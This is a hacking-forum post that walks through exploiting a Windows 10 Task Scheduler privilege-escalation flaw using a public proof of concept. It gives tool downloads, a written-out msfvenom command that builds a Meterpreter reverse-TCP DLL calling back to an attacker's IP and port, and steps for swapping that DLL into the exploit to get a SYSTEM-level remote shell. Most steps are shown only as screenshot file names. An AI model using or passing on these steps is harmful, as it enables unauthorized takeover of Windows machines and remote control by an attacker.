windows-privilege 0day

enhackapt

Administrator
Staff member
Joined
Dec 10, 2024
Messages
21
The function exported by the task scheduling service in Windows 10 does not verify the caller's permissions. Users with any permissions can obtain write permissions for sensitive system files by calling this function, thereby escalating privileges. Scope of impact: Windows 10, Windows Server 2016 Yesterday, the friends in the group reproduced it and succeeded. Some friends also tried it on Windows 8 and found that they could also escalate privileges successfully.


Preparation: Download POC, Windows 10 image, Process Explorer, CFF
POC: GitHub - SandboxEscaper/randomrepo: Repo for random stuff
Windows 10 ISO: msdn Download
Process Explorer: Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore


First open a notepad

Windows privilege escalation 0day HACKAPT-1.png



There is no difference, execution
Windows privilege escalation 0day HACKAPT-2.png



cmd.exe with child processes conhost and notepad has been generated as SYSTEM!



In kali execute msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll

PvFgQP.md.png



Moving to Windows 10
Windows privilege escalation 0day HACKAPT-4.png



Open ALPC-TaskSched-LPE.dll in CFF and replace the dll generated by msf, then save it.
Windows privilege escalation 0day HACKAPT-5.png







Windows privilege escalation 0day HACKAPT-6.png



Execute monitoring commands in Kali
Windows privilege escalation 0day HACKAPT-7.png



Execute in Windows 10
Windows privilege escalation 0day HACKAPT-8.png



Return to Kali and you can find that a meterpreter has been successfully bounced back, and it has system permissions
Windows privilege escalation 0day HACKAPT-9.png







Windows privilege escalation 0day HACKAPT-10.png







Windows privilege escalation 0day HACKAPT-11.png
 
Back
Top